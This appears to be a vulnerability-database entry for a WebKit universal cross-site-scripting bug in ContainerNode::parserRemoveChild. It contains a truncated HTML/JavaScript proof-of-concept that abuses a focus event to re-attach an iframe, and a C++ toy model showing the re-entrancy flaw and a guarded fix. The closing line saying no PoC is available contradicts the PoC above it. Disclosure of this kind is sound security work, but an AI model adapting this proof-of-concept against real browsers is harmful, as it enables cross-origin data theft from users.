WebKit: UXSS via...

Published: 2025-04-13
Revised: 2025-04-13

Here's a snippet of ContainerNode::parserRemoveChild.

```
void ContainerNode::parserRemoveChild(Node& oldChild)
{
    disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)
    ...
    document().notifyRemovePendingSheetIfNeeded(); <<---- (b)
}
```

Subframes are detached at (a). But in |notifyRemovePendingSheetIfNeeded| at (b), which fires a focus event, we can attach subframes again.

### PoC:

```
<html>
<head>
</head>
<body>
<script>
let xml = `
<body>
<div>
<b>
<p>
<script>
let p = document.querySelector('p');
let link = p.appendChild(document.createElement('link'));
link.rel = 'stylesheet';
link.href = 'data:,aaaaazxczxczzxzcz';
let btn = document.body.appendChild(document.createElement('button'));
btn.id = 'btn';
btn.onfocus = () => {
    btn.onfocus = null;
    window.d = document.querySelector('div');
    window.d.remove();
    link.remove();
    document.body.appendChild(p);
    let m = p.appendChild(document.createElement('iframe'));
    setTimeout(() => {
        document.documentElement.innerHTML = '';
...
```
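The bug class described above is a re-entrancy hazard: a removal routine establishes an invariant (no attached subframes under the child being removed), then calls into something that can run script before returning, and script undoes the invariant. The toy model below is an added illustration, not WebKit code; the types `Node`, `Subframe` and `Document` and the two `parserRemoveChild*` functions are hypothetical stand-ins that mirror the report's vocabulary, and the "guarded" variant shows one generic mitigation (re-validate any state touched before a script-running callback) rather than WebKit's actual patch, which this page does not show.

```cpp
// Added illustration (not WebKit code): a toy model of the re-entrancy hazard in
// a tree-removal routine that fires a script-visible event part-way through.
#include <functional>
#include <vector>

struct Subframe { bool attached = true; };

struct Node {
    std::vector<Subframe*> subframes;   // subframes under this subtree (flattened)
};

struct Document {
    // Script-visible callback that the removal path may trigger; models the focus
    // event fired from notifyRemovePendingSheetIfNeeded in the report.
    std::function<void()> onFocus;
    void notifyRemovePendingSheetIfNeeded() { if (onFocus) onFocus(); }
};

static void disconnectSubframes(Node& n) {
    for (auto* f : n.subframes) f->attached = false;
}

static bool anyAttached(const Node& n) {
    for (auto* f : n.subframes) if (f->attached) return true;
    return false;
}

// Ordering as described on the page: detach, then run a callback that can run
// script, and return without re-checking the invariant.
static void parserRemoveChildUnguarded(Document& doc, Node& oldChild) {
    disconnectSubframes(oldChild);          // (a)
    doc.notifyRemovePendingSheetIfNeeded(); // (b) may run script
}

// Hardened variant (hypothetical mitigation): treat state established before a
// script-running callback as stale afterwards and re-establish it.
static void parserRemoveChildGuarded(Document& doc, Node& oldChild) {
    disconnectSubframes(oldChild);
    doc.notifyRemovePendingSheetIfNeeded();
    if (anyAttached(oldChild))
        disconnectSubframes(oldChild);      // script re-attached something: detach again
}

// Constructed scenario: the focus handler inserts a new subframe into the node
// being removed (what `p.appendChild(document.createElement('iframe'))` does in
// the report's handler). Returns true when the post-condition "no attached
// subframes in the removed subtree" holds after the call.
static bool runScenario(void (*remove)(Document&, Node&)) {
    Document doc;
    Node oldChild;
    Subframe original, injected;
    injected.attached = false;              // not yet in the tree
    oldChild.subframes.push_back(&original);
    doc.onFocus = [&] {
        injected.attached = true;
        oldChild.subframes.push_back(&injected);
    };
    remove(doc, oldChild);
    return !anyAttached(oldChild);
}

bool unguardedHoldsInvariant() { return runScenario(parserRemoveChildUnguarded); }
bool guardedHoldsInvariant()   { return runScenario(parserRemoveChildGuarded); }

int main() {
    // Exit status 0 when the unguarded path breaks the invariant and the guarded one keeps it.
    return (!unguardedHoldsInvariant() && guardedHoldsInvariant()) ? 0 : 1;
}
```

The point for reviewers of DOM-mutation code is the shape of the defect, not the specific callback: any call that can dispatch an event between establishing an invariant and returning must be followed by a re-check, or the event must be deferred until the mutation is complete.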

No Exp or PoC available
Currently 0 affected product records